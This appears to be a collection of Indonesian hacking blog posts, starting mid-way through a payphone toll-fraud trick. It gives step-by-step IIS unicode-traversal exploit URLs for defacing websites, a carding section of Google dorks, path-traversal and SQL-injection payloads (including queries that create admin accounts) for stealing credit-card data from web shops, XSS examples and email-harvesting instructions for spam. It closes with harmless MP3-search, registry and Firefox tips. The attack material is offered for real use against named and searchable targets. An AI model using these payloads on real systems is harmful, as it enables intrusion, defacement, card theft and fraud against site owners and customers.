misal: tujuan 021888555000 -> bila telah selesai ketikan 021888555000 lagi
JANGAN PAKAI TOMBOL RADIAL, KARENA SERING GAGAL
TRIK 2. - SEPERTI CARA TRIK PERTAMA TADI CUMAN KITA RUBAH NOMOR TUJUAN AKHIR
misal: tujuan 021888555000 -> bila telah selesai ketikan 031545552222 (BEDA NOMOR TUJUAN)
JANGAN PAKAI TOMBOL RADIAL, KARENA SERING GAGAL
CATATAN: Hati-hati dalam melakukan aksi ini karena sangat merugikan pihak lain. Jangan sekali-kali gunakan wartel tipe A untuk melakukan trik II telepon gratis keluar kotak karena akan kelihatan pada komputer billing operator dan pasti Anda akan dicurigai karena pulsa akan hilang begitu saja dari layar monitor operator Wartel. Jangan menggunakan trik ini kanare akan merugikan "pihak lain" =))
Cara Cepat Bongkar Password
Posted OnAda cara cepat menerobos password windows ( termasuk jaringan windows ) saat anda lupa yakni menngunakan @stake LC4 (dulunya bernama L0pht Crack).
LC4 sanggup melawan mesin windows anda dengan sebuah kombinasi dari kamus dan serangan brutal orang2 usil.LC4 bisa mengcrack hampir semua password dalam hitungan detik saja.bahkan pada password yang terdiri dari angka dan karakter2 panjang.
Seperti diketahui Password windows Nt,2000,dan juga XP disimpan menggunakan sandi (encrypt) hash marks.LC4 sanggup membongkar hash marks tersebut dengan proses kerja ratusan password per menitnya.selanjtnya,password yang tepat akan dikirim dan ditampilkan ke layar monitor
Dalam sebuah perusahaan,LC4 bisa digunakan untuk mengakses PC karyawan.ia bisa digunakan untuk mengakses komputer dari user-user yang lupa dengan password-nya.maksudnya,System Administrators jaringan bisa mencari password yang lemah dalam beberapa menit.bahkan juga,sys admins bisa merubah password tersebut agar lebih aman
Kejelekan program pembongkar password ini,seseorang yang usil bisa menggunakan LC4 ini untuk mencium (Mengawasi) password2 dari user sebuah jaringan.bahkan,seorang hacker bisa memasang aplikasi primary domain controller dan menjegal ratusan password berharga hanya dalam hitungan menit.
Info dan Download Program LC4beserta versi evaluasi ini bisa diambil http://www.atstake.com/research/lc/
Cara Mendapatkan Puluhan Ribu Email
Posted OnA. Gunakan software Mailcrawl (notworksolution.com) Versi gratisnya bisa menyimpan 3.000 email sekali pencarian, bisa diakali sampai bisa menyimpan 15.000 email/keyword.
Cara menggunakan :
1. Pada quick start wizard click using target searching kemudian masukkan keyword khas Indonesia
(keluarga, uang, wanita, sukses, pertanian, militer)
2. Option :
a. thread pilih 60-80
b. email parsing: klik only extract email with these extension/domain lalu isi .com .net .id c. pada ignore email with these username isi dengan daftar kata di bawah : (copy saja)
abuse info consult notice privacy support spam nospam sales bugtraq listserv subscribe unsubscribe
majordomo reply bounce mail nama domain daemon www news xxx 20 3d file main webadmin webmaster
admin owner promaster postmaster hostmaster manajerhosting tuanweb webhosting daftar register billing
customercare customerservice cs feedback komentar manager namaanda name username yourname
support technical service cs prohosting zzz info support technical request join berhenti
anggota menu index help file artikel d. automatic saving pilih angka 1.000 e. Start --- beri nama folder tempat penyimpanan hasil sesuai dengan nama keyword f. Jika angka email valid belum mencapai 1,000 sedangkan panel pencarian telah mendekati batas akhir,
lakukan stop kemudian tambahkan keyword baru tanpa harus mereset lagi. Sebaiknya nama folder
penyimpanan gabungan keyword
g. Jika angka email valid telah mendekati angka 3.000 sementara panel pencarian masih jauh dari batas
akhir. Lakukan stop lalu start kemudian beri nama baru folder hasil pencarian, sebaiknya keyword1,
keyword2 dst.
3. Jika telah dilakukan pengumpulan dengan banyak keyword, pasti ada email ganda.
Untuk mendapatkan daftar email tunggal gunakan software Listawy (mewsoft.com). Sofware ini selain bisa
merge, removal email juga mensplit seluruh email menurut jumlah file atau jumlah email/per file
Comersus Shoping Cart
Posted OnDengan google, cari kata kuncinya :
allinurl:comersus_message.asp
allinurl:comersus_backoffice_message.asp
setelah itu kita beri tambahan dengan croos scripting, misalnya :
http://www.target.net/comersus/store/comersus_message.asp?message=
PeNcOpEt_CiNtA
atau kita bisa mengirim email untuk admin hehehehe ini contoh lagi :
http://www.target.net/comersus/backofficelite/comersus_backoffice_
Deface NT Web
Posted OnDeface adalah kegiatan untuk mengganti ataupun merubah tampilan halaman depan sebuah situs. Tentu saja prosesnya dilakukan dengan memanfaatkan kelemahan dari situs tersebut, sehingga kalo loe adalah web master dan loe ngerubah tampilan halaman situs yang loe punya tentu saja
itu nggak bisa disebut deface...heheheh. Banyak yang bertanya "gimana sich nge-deface situs?" seperti yang telah gue sebutin diatas proses deface dilakukan dengan memanfaatkan lubang (hole) yang terdapat pada server tempat situs itu berada. Sehingga hal pertama yang harus kamu ketah
ui untuk melakukan proses deface adalah OS (Operating System) dari server situs tersebut. Hal ini karena karakteristik dari tiap OS yang berbeda-beda, contohnya antara IIS dengan BSD tentu saja sangat berbedaapabila kita ingin melakukan deface diantara kedua OS tsb. Operating
System atau OS biasanya kalo gue sich gue kelompikin ke 2 keluarga besar,yaitu :
1. IIS (server untuk microsoft, dkk)
2. Unix(linux,BSD,IRIX,SOLARIS,dsb)
Nah kita kelompikin jadi 2 gitu aja yah..:) sekarang saya coba jelaskan satu-satu. Dikarenakan sudah banyak tutorial yang membahas mengenai kelemahan dari IIS (baik IIS 4 maupun 5) maka disini gue cumancopy-paste tutorial yang pernah dibuat oleh salah satu "maha guru" dalam
komunitas #cracxer di DALNET, yah sapa lagi kalo bukan "pak-tani" (master..paLa loE lONjoNG..!!) heheheeh... ini dia tutorialnya :
~*~DEFACING NT WEB SERVER WITH BUG UNICODE MICROSOFT IIS~*~
-------------------------------------------------------------
Melalui tutor ini saya teh hanya ingin berbagi pengalaman mengenai cara men-deface website yang
menggunakan Microsoft Internet Information Server atau Microsoft IIS. Harap DeFaceR (sebutan bagi org yg suka deface..;p) ketahui...Microsoft Internet Information Server atau MS IIS 4.0/5.0 memiliki suatu bug yang dinamakan "unicode bug". Sayah tidak akan menjelaskan panjang lebar mengenai "unicode bug" ini karena sayah takut salah menjelaskan (ssSSTTtHHH!! jgn bilang sapa2 yah sebenernyah sayah teh emang gak tau ...ehehehheehhe..;p~). Yang jelas dengan bug ini kita bisa mengeksplorasi komputer target dengan hanya menggunakan internet browser.
OK...mari kita mulai...Pertama kita cari site site target terlebih dahulu di search engine (google,yahoo,dll)...key nya terserah kowe.....Lalu utk mengetahui site itu menggunakan
MS IIS 4.0/5.0...Kita scan terlebih dahulu di www.netcraft.com......dapat site yah..??...Okeh..
setelah kita mendapatkan site yg menggunakan MS IIS 4.0/5.0 ...Langkah selanjutnya utk mengetahui site tersebut belum di-patch bug unicode nya mari kita scan site tersebut di mirc (utk mengeteahui cara scan lewat mirc....coba koe buka http://www.jasakom.com/hacking.asp page 3 Scanning Exploit Unicode Dengan MIRC),bisa juga memakai sopwer yg bisa and DL di http://accessftp.topcities.com/.... or memakai cara manual yg lebih sering sayah gunakan ehehhehehhee...contoh:
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
Ada dua kemungkinan yang tampil pada browser Anda yaitu:
Kahiji : Muncul pesan ERROR ...
Kaduana : Muncul daftar file-file dari drive C pada komputer server target. Bila ini terjadi maka
www.targethost.com tadi ada kemungkinan untuk bisa kita deface...
Mari kita perhatikan URL aneh bin ajaib diatas. Akan sayah bagi URL diatas menjadi empat bagian yaitu :
• Bagian host, yaitu "http://www.targethost.com"
• Bagian exploit string, yaitu "/scripts/..%255c..%255c"
• Bagian folder, yaitu "/winnt/system32/"
• Bagian command, yaitu "cmd.exe?/c+dir+c:\"
Kita lihat pada bagian command diatas menunjukkan perintah "dir c:\" yang berarti melihat seluruh
file-file yang berada pada root drive C. Koe bisa mencoba perintah yang lain seperti "dir d:\"
atau yang lain. Ingat, Koe harus mengganti karakter spasi dengan tanda "+". Koe bahkan bisa menge
tahui konfigurasi IP address komputer tujuan dengan mengetikkan perintah "ipconfig.exe /all"
Selain itu ada beberapa kemungkinan yaitu bisa saja URL diatas masih menampilkan error pada
browser koe. Untuk itu koe ganti sajah bagian eksploit stringnyah, eksploit string yg sering
tembus adalah :
- /cgi-bin/..%255c..%255c
- /msadc/..%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af..
- /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /scripts/..%255c..%255c
Jika semua pilihan eksploit string diatas masih memunculkan pesan error pada browser koe maka
kemungkinan besar IIS pada web server sudah di-patch bug unicode nya (OR IE kowe yg lagie dodolss ...hiheiehiehiehei). Dan koe bisa memilih situs lain sebagai sasaran....(yg sabar yah nak nyari targetnyah...ehehhehehe).
Lanjuttt......udeh dapet site yg bug unicodenyah gak di patch..??....Langkah berikutnya adalah
mengetahui di folder manakah diletakkan dokumen-dokumen web seperti default.htm/html/asp,,
index.htm/html/asp,home.htm/html/asp,main.htm/html/asp,.ada juga yg pake .php/php3/shtml.
Folder ini dinamakan web root. Biasanya web root berada di C:\InetPub\wwwroot\ atau
D:\InetPub\wwwroot. Tapi terkadang web administrator menggantinya dengan yang lain. Untuk mengetahuinya koe cukup mengetikkan URL seperti di bawah ini
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+set
URL diatas akan menampilkan daftar environment variable dari web server sasaran. Kebuka..??...
Nah tugas koe skrg adalah mencari PATH_TRANSLATED atau tulisan PATH_TRANSLATEDnyah...gak ada yahh ..??...coba deh koe ripresh lagehh...udah ketemuuu...nah skrg kita DIR deh tuh si PATH_TRANSLATED nyah.....Kita ambil contoh PATH_TRANSLATEDnyah : C:\InetPub\wwwroot....Perintahnya ng-DIR nyah :
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot
Huaaaaaaa....isinyah banyak banged yahh.....mana dokumen2 web yg kita curigain itu ada 3 bijih
lagehh....hemm santeyy...oiyahh...lupa sayah...Tugas kita setelah ng-DIR PATH_TRANSLATEDnyah.....
truss kita cari dokumen web itu disitu utk kita RENAME....gemana kalo misalnyah dokumen2 web yg kita curigain itu ada 3..santeyy...coba skrg koe buka site aslinyah di laen window....
http://www.targethost.com == neh yg ini......di situ kan alias di
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot
dokumen2 web nyah ada 3 macem pasti kita bingung yg mana neh yg mo di RENAME....misalnya : di
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot itu ada :
Directory of C:\InetPub\wwwroot
07/20/01 03:21p 1,590 default.htm
07/20/01 03:21p 590 index.html
07/20/01 03:21p 3,453 main.html
Udah di buka kan site aslinyah...nah coba masukin salah satu dokumen web itu di site asli nyah...
contoh : http://www.targethost.com/default.htm kita liad hasilnya apa kah sama gambarnya (halaman depannya) setelah kita masukin dokumen web tadee.waww ternyata tidak sama hemm.coba masukin lageh salah satu dokumen web itu site aslinyah.mMmm..kita masukin yg main.html.waww waww..ternyata sama gambarnyahh.Nah skrg kita RENAME deh yg main.html ituu. perintahnya :
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ren+C:\InetPub\wwwroot\main.html+gue.html
Lihat apa yg terjadi di IE kitaa
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
Access is denied
Yahhhh..akses dineyy.hiekksss jgn nyerah bro` kita carih lageh targetnyah okeHh !!!Dapat
targetnyah..??udah di RENAME nyah??.Hasilnya setelah di RENAME seperti di bawah ini bukan??
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are :
Kalo iyahh.waaa selamat anda telah merubah or berhasil men-deface halaman depan web site
tersebut.kalo gak caya buka ajah site aslinyah pasti ERROR kann ehehhehehhee
(Jgn lupa kita simpan C:\InetPub\wwwroot\main.html *file yg kita rename tadi di notepad utk
langkah selanjutnyah*)
Sekarang koe tugasnyah meng-upload file koe ke site tadee Ada dua cara my bro` Pertama lewat ECHO..
Kedua lewat TFTP32.
*Cara pertama :*
Utk meng-upload file lewat echo sebelumnyah kita harus mengcopy file cmd.exe pada direktori
C:\winnt\system32 ke suatu folder lain atau folder yang sama dengan nama lain, misalnya cmdku.exe
. Untuk meng-copy cmd.exe menjadi cmdku.exe pada folder winnt\system32 maka cukup ketik URL
berikut :
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+
ASP
Posted Onlebih lanjut...
ARF yang dikeluarkan oleh http://www.asp-dev.com/ bekerja pada platform Windows memiliki bug yang sangat fatal. Yaitu admin (sebenarnya admin atau pembuat template ya ?) tidak memberikan login username dan password pada bagian administrator web nya, sehingga siapa saja bisa masuk melalui http://www.target.com/forum/admin/default.asp
Sehingga semua orang bisa masuk dan melakukan editing / penghapusan / penambahan isi dari BBS -nya.
Jika anda menggunakan template tersebut dalam BBS anda, sebaiknya menambahkan login username dan password pada bagian /admin/default.asp sehingga BBS anda terhindar dari kejahilan orang lain.
Contoh yang bisa dicoba seperti berikut ini (saat penulisan ini belum dipatch) :
1. http://www.rvnair.com/bbs/admin/default.asp
2. http://www.equuspages.com/forum/forum2/admin/
3. http://www.joinweb.com/forum/admin/
Trik Carding
Posted On1. contoh bugs pada bentuk toko sistem shopadmin :
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
Ketik google.com :--> allinurl:/shopadmin.asp
Contoh target : www.xxxxxx.com/shopadmin.asp
Kelemahan sistem ini bila penjahat memasukan kode injection seperti :
user : 'or'1
pass : 'or'1
2. contoh bugs pada bentuk toko sistem : Index CGI
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com : Ketik --> allinurl:/store/index.cgi/page=
Contoh target : www.xxxxxx.com/cgi-bin/store/index.cgi?page=short_blue.htm
Hapus short_blue.htm dan ganti dengan --> ../admin/files/order.log
Hasilnya:www.xxxxxxx.com/cgi-bin/store/index.cgi?page=../admin/files/
order.log
3. contoh bugs pada bentuk toko sistem : metacart
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com allinurl:/metacart/
Contoh target : www.xxxxxx.com/metacart/about.asp
Hapus moreinfo.asp dan ganti dengan --> /database/metacart.mdb
Hasilnya : /www.xxxxxx.com/metacart/database/metacart.mdb
4. contoh bugs pada bentuk toko sistem :DCShop
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com : Ketik --> allinurl:/DCShop/
Contoh : www.xxxxxx.com/xxxx/DCShop/xxxx
Hapus /DCShop/xxxx dan ganti dengan --> /DCShop/orders/orders.txt
atau /DCShop/Orders/orders.txt
Hasilnya : www.xxxx.com/xxxx/DCShop/orders/orders.txt
5. contoh bugs pada bentuk toko sistem : PDshopro
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com : Ketik --> allinurl:/shop/category.asp/catid=
Contoh : www.xxxxx.com/shop/category.asp/catid=xxxxxx
Hapus /shop/category.asp/catid=xxxxx dang ganti dengan --> /admin/
dbsetup.asp
Hasilnya : www.xxxxxx.com/admin/dbsetup.asp
Dari keterangan diatas , kita dapati file databasenya dgn nama
sdatapdshoppro.mdb
Download file sdatapdshoppro.mdb dengan merubah url nya menjadi
www.xxxxxx.com/data/pdshoppro.mdb
Buka file tsb pakai Microsoft Acces (karena untuk membaca database
access.mdb sebaiknya pake ms access aja)
6. contoh bugs pada bentuk toko sistem : commerceSQL
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google : Ketik --> allinurl:/commercesql/
Contoh : www.xxxxx.com/commercesql/xxxxx
Hapus commercesql/xxxxx dan ganti dengan -->
cgi-bin/commercesql/index.cgi?page=
Hasilnya : www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=
Untuk melihat admin config -->
www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl
Untuk melihat admin manager -->
www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi
Untuk melihat file log/CCnya -->
www.xxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/files/order...
7. contoh bugs pada bentuk toko sistem : EShop
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google: Ketik --> allinurl:/eshop/
Contoh : www.xxxxx.com/xxxxx/eshop
Hapus /eshop dan ganti dengan --> /cg-bin/eshop/database/order.mdb
Hasilnya : www.xxxxxx.com/.../cg-bin/eshop/database/order.mdb
Download file *.mdb nya dan Buka file tsb pakai Microsoft Acces
(karena untuk membaca database access.mdb sebaiknya pake ms access
aja)
8. contoh bugs pada bentuk toko sistem : Cart32 v3.5a
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com: Ketik --> allinurl:/cart32.exe/
Contoh : www.xxxxxx.net/wrburns_s/cgi-bin/cart32.exe/NoItemFound
Ganti NoItemFound dengan --> error
Bila kita mendapati page error dg keterangan instalasi dibawahnya,
berarti kita sukses!
Sekarang, kita menuju pada keterangan di bawahnya, geser halaman
kebawah, dan cari bagian Page Setup and Directory
Kalau dibagian tersebut terdapat list file dgn format/akhiran .c32
berarti di site tsb. terdapat file berisi data cc
Copy salah satu file .c32 yg ada atau semuanya ke notepad atau program
text editor lainnya.
Ganti string url tsb. menjadi seperti ini : http://www.xxxxxx.net/wrburns_s/cgi-bin/cart32/
Nah.., paste satu per satu, file .c32 ke akhir url yg sudah
dimodifikasi tadi, dengan format
http://www.xxxxx.com/cart32/
Contoh http://www.xxxxxxx.net/wrburns_s/cgi-bin/cart32/WRBURNS-001065.c32
9. contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0
teknik/jalan ke dua
google.com Ketik --> allinurl:/vpasp/shopdisplayproducts.asp
Buka url target dan tambahkan string berikut di akhir bagian
shopdisplayproducts.asp
Contoh :
http://xxxxxxx.com/vpasp/shopdisplayproducts.asp?cat=qwerty'%20union%...,
fldpassword%20from%20tbluser%20where%20fldusername=
'admin'%20and%20fldpassword%20like%20'a%25'--
Gantilah nilai dari string url terakhir dg:
%20'a%25'--
%20'b%25'--
%20'c%25'--
Kalau berhasil, kita akan mendapatkan informasi username dan password
admin
Untuk login admin ke http://xxxx.com/vpasp/shopadmin.asp
silahkan Cari sendiri data CCnya
10. contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com : Ketik --> allinurl:/vpasp/shopsearch.asp
Buka url target dan utk membuat admin baru, postingkan data berikut
satu per satu pada bagian search engine :
Keyword=&category=5); insert into tbluser (fldusername) values
('')--&SubCategory=&hide=&action.x=46&action.y=6
Keyword=&category=5); update tbluser set fldpassword='' where
fldusername=''--&SubCategory=All&action.x=33&action.y=6
Keyword=&category=3); update tbluser set fldaccess='1' where
fldusername=''--&SubCategory=All&action.x=33&action.y=6
Jangan lupa untuk mengganti dan nya terserah kamu.
Untuk mengganti password admin, masukkan keyword berikut :
Keyword=&category=5); update tbluser set fldpassword='' where
fldusername='admin'--&SubCategory=All&action.x=33&action.y=6
Untuk login admin, ada di http://xxxxxxx/vpasp/shopadmin.asp
11. contoh bugs pada bentuk toko sistem : Lobby.asp
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com Ketik --> allinurl: Lobby.asp
Contoh : www.xxxxx.com/mall/lobby.asp
Hapus tulisan mall/lobby.asp dan ganti dengan --> fpdb/shop.mdb
Hasilnya : www.xxxxx.com/fpdb/shop.mdb
12. contoh bugs pada bentuk toko sistem : Shopper.cgi
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google : Ketik --> allinurl: /cgi-local/shopper.cgi
Contoh : www.xxxxxx.com/cgi-local/shopper.cgi/?preadd=action&key=
Tambah dengan --> ...&template=order.log
Hasilnya : www.xxxxxxxx.com/cgi-local/shopper.cgi?preadd=action&key=...&template...
13. contoh bugs pada bentuk toko sistem :Proddetail.asp
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
Ketik --> allinurl:proddetail.asp?prod=
Contoh : www.xxxxx.org/proddetail.asp?prod=ACSASledRaffle
Hapus tulisan proddtail.asp?prod=SG369 dan ganti dengan --> fpdb/
vsproducts.mdb
Hasilnya : www.xxxxxx.org/fpdb/vsproducts.mdb
14. contoh bugs pada bentuk toko sistem :Digishop
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google Ketik --> inurl:"/cart.php?m="
Contoh : http://xxxxxxx.com/store/cart.php?m=view.
Hapus tulisan cart.php?m=view dan ganti dengan -->admin
Hasilnya http://xxxxxx.com/store/admin
Trus masukin username sama pass nya pake statment SQL injection
Usename : 'or"="
Password : 'or"="
.::Note!::..
I DONT TAKE ANY RESPONSIBLE FOR ANYTING... U TAKE UR OWN RISK..!!!
Cara Download mp3
Posted OnPanduan mencari dan men-download MP3 lagu Indonesia (dan Barat) secara gratis di Internet
Guide to search and download Indonesian MP3 song on the internet
http://downloadlaguindonesia.net/downloadlaguindonesia.net
Your Ad Here
Buka Google
Masukkan query berikut ke dalam kotak pencarian.
?intitle:index.of? mp3 [artist] [title]
Ubah [artist] dengan nama artis/band/penyanyi yg Anda cari
Ubah [title] dengan judul lagu yg Anda cari.
Contoh:
?intitle:index.of? mp3 coldplay
?intitle:index.of? mp3 “simple plan”
?intitle:index.of? mp3 “simple plan” untitled
?intitle:index.of? mp3 “welcome to my life”
Contoh hasil pencarian:
Tekan salah satu dari hasil pencarian di atas, dan hasilnya adalah sbb:
Jika sesuai dengan yg Anda inginkan, tekan Klik Kanan dan pilih Save As untuk menyimpan MP3 lagu tersebut.
Selamat mencoba!
Sumber: How To Download MP3 from WWW Using Google http://downloadlaguindonesia.net/downloadlaguindonesia.net
Your Ad Here
Daftarkan diri Anda terlebih dahulu ke Multiply.com jika belum mempunyai account di sana.
Buka Google
Masukkan query berikut ke dalam kotak pencarian.
?inurl:multiply.com/music? [artist] [title]
Ubah [artist] dengan nama artis/band/penyanyi yg Anda cari
Ubah [title] dengan judul lagu yg Anda cari.
Contoh:
?inurl:multiply.com/music? dewa
?inurl:multiply.com/music? dewa dewi
?inurl:multiply.com/music? "ada band" "haruskah ku mati"
Contoh hasil pencarian:
Tekan salah satu dari hasil pencarian di atas, dan hasilnya adalah sbb:
Jika sesuai dengan yg Anda inginkan, tekan Klik Kanan dan pilih Save As untuk menyimpan MP3 lagu tersebut.
Selamat mencoba!
Ngilangin drive di PC
Posted Onga ada persipan khusus buat ngilangin drive di PC km, cuma ngerubah registry aja kok, berarti yang kamu butuhkan just only PC yang pake OS Win XP (all SP) n Win ME, (kalo di 98 blm dicoba). itu aja……
Nah skr ikutin langkah2 nya:
1. Klik tombol START trus lo pilih RUN di jendela RUN tadi itu lo ketik “Regedit” (gak pake tanda kutip)
2. Nah skr lo dah di jendela Registry Editor, trus cari HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
3. Buka folder EXPLORER tadi, trus klik kanan di area kosong di panel bagian kanan, klik NEW trus klik DWORD Value, trus beri nama NoDrives
4. klik ganda NoDrives tadi, trus ubah angka di value data nya sesuai dgn drive mana yg mau lo ilangin, ni angka bwt ngilangin drive nya:
Drive A = 1 Drive H = 128 Ngilangin semua drive = 67108863
Drive B = 2 Drive I = 256
Drive C = 4 Drive J = 512
Drive D = 8 Drive K = 1024
Drive E = 16 Drive L = 2048
Drive F = 32 Drive M = 4096
Drive G = 64 Drive N = 8192
5. kalo udah, close registry editornya trus restart PC nya…!!
6. kalo udah lo restart buka My Computer trus liat, ga ada kan drive yang dah lo ilangin tadi….
7. tenang aja semua data yang ada di drive tadi aman kok…..suerrr!!!!
==============================================
CARA NGEMBALIIN KE SEPERTI SEMULA:
1. ikuti langkah diatas (no 1 ampe no 2) yach!!!!!
2. Buka folder EXPLORER nya, trus cari NoDrives nya
3. Nah di jendela NoDrives, rubah Value Data yang tadinya 4 (misal: untuk drive C) atau angka drive yang dah lo masukin, trus ganti jadi 0 (nol), atau hapus aja langsung nama file NoDrives tadi
4. Restart tuch PC, and than liat aja di my computer drive yang diilangin tadi pasti udah ada……
5. udah gtu doank kok….
membuat firefox lebih cepat30 %
Posted On1. ketik “about:config” pada address bar dan tekan enter. turunkan scroll kebawah dan cari entries berikut :
network.http.pipelining
network.http.proxy.pipelining
network.http.pipelining.maxrequests
Secara normal browser akan membuat satu request untuk satu halaman web dalam satu kali . ketika kamu enable pipelining, itu akan membuat beberapa halaman dalam sekali. dan akan mempercepat page loading
2. rubah entries berikut menjadi :
Set “network.http.pipelining” menjadi “true”
Set “network.http.proxy.pipelining” menjadi “true”
set “network.http.pipelining.maxrequests” menjadi nilai seperti “30″. ini artinya akan membuat 30 request dalam sekali.
3.terakhir klik kiri (dimana saja) select New-> Integer. masukan “nglayout.initialpaint.delay” pada prefence name, kemudia set nilai menjadi “0″.
atau kalo ngga mau repot masuk ke sini
download ini
https://addons.mozilla.org/firefox/1269/
